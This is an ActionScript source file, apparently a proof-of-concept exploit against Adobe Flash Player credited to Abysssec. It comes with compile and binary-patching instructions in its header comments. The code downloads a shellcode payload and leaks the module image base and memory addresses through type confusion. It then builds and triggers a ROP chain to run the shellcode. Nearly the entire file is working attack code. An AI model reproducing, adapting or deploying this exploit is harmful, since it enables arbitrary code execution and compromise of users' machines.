93 lines
2.3 KiB
ActionScript
Executable File
93 lines
2.3 KiB
ActionScript
Executable File
// compile >mxmlc -source-path=c:\ C:\poc\main.as
|
|
// decompress using SWF_Compressor
|
|
// change 07 01 02 07 |01| 03 07 02 05 -> 07 01 02 07 01 |02| 07 02 05
|
|
// Shahin [at] abysssec.com
|
|
// twitter: @abysssec
|
|
|
|
package poc
|
|
{
|
|
|
|
import flash.utils.*;
|
|
import flash.display.*;
|
|
import flash.text.*;
|
|
import flash.external.*
|
|
import flash.events.*;
|
|
|
|
public class main extends Sprite
|
|
{
|
|
|
|
public var d:Download = new Download();
|
|
|
|
function get get_test1():Real_Ref_Class
|
|
{
|
|
return null;
|
|
}
|
|
|
|
public function main()
|
|
{
|
|
d.addEventListener(Event.COMPLETE, onLoad);
|
|
d.init();
|
|
}
|
|
|
|
public function onLoad(e:Event):void {
|
|
var payload:String = d.getBinary();
|
|
Real_Ref_Class.setShellcode(payload);
|
|
sploit();
|
|
}
|
|
|
|
public function sploit()
|
|
{
|
|
/////////////////////// LEAK IMAGE BASE ////////////////////////////
|
|
|
|
var objshellcode:uint = Original_Class.shellcode();
|
|
var p_objshellcode:uint = objshellcode & 0xFFFFFFF8;
|
|
|
|
var str_objshellcode:String = p_objshellcode.toString();
|
|
var int_str_objshellcode = Original_Class.strToInt(str_objshellcode);
|
|
|
|
var z:Number = new Number(int_str_objshellcode);
|
|
var b:ByteArray = new ByteArray();
|
|
b.writeDouble(z);
|
|
var res:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
|
|
|
|
var imageBase:uint = res - 0X004E2F58;
|
|
|
|
|
|
/////////////////// LEAK SHELLCODE STRING ADDRESS /////////////////
|
|
|
|
var temp:uint = p_objshellcode + 0x8;
|
|
|
|
str = temp.toString();
|
|
istr = Original_Class.strToInt(str);
|
|
|
|
z = new Number(istr);
|
|
|
|
b = new ByteArray();
|
|
b.writeDouble(z);
|
|
var SHELLCODELeak = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
|
|
|
|
|
|
///////////////////// LEAK ROPPayload ADDRESS /////////////////
|
|
|
|
var objROPPayload:uint = Original_Class.ROPPayload(imageBase,SHELLCODELeak);
|
|
var temp2:uint = objROPPayload & 0xFFFFFFF8;
|
|
var str:String = temp2.toString();
|
|
var istr = Original_Class.strToInt(str);
|
|
|
|
temp = temp2 + 0x8;
|
|
|
|
str = temp.toString();
|
|
istr = Original_Class.strToInt(str);
|
|
|
|
z = new Number(istr);
|
|
|
|
b = new ByteArray();
|
|
b.writeDouble(z);
|
|
var ROPPayloadLeak:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
|
|
|
|
var obj:Original_Class = Original_Class.static_func1(ROPPayloadLeak, imageBase);
|
|
obj.normal_func();
|
|
}
|
|
}
|
|
|
|
} |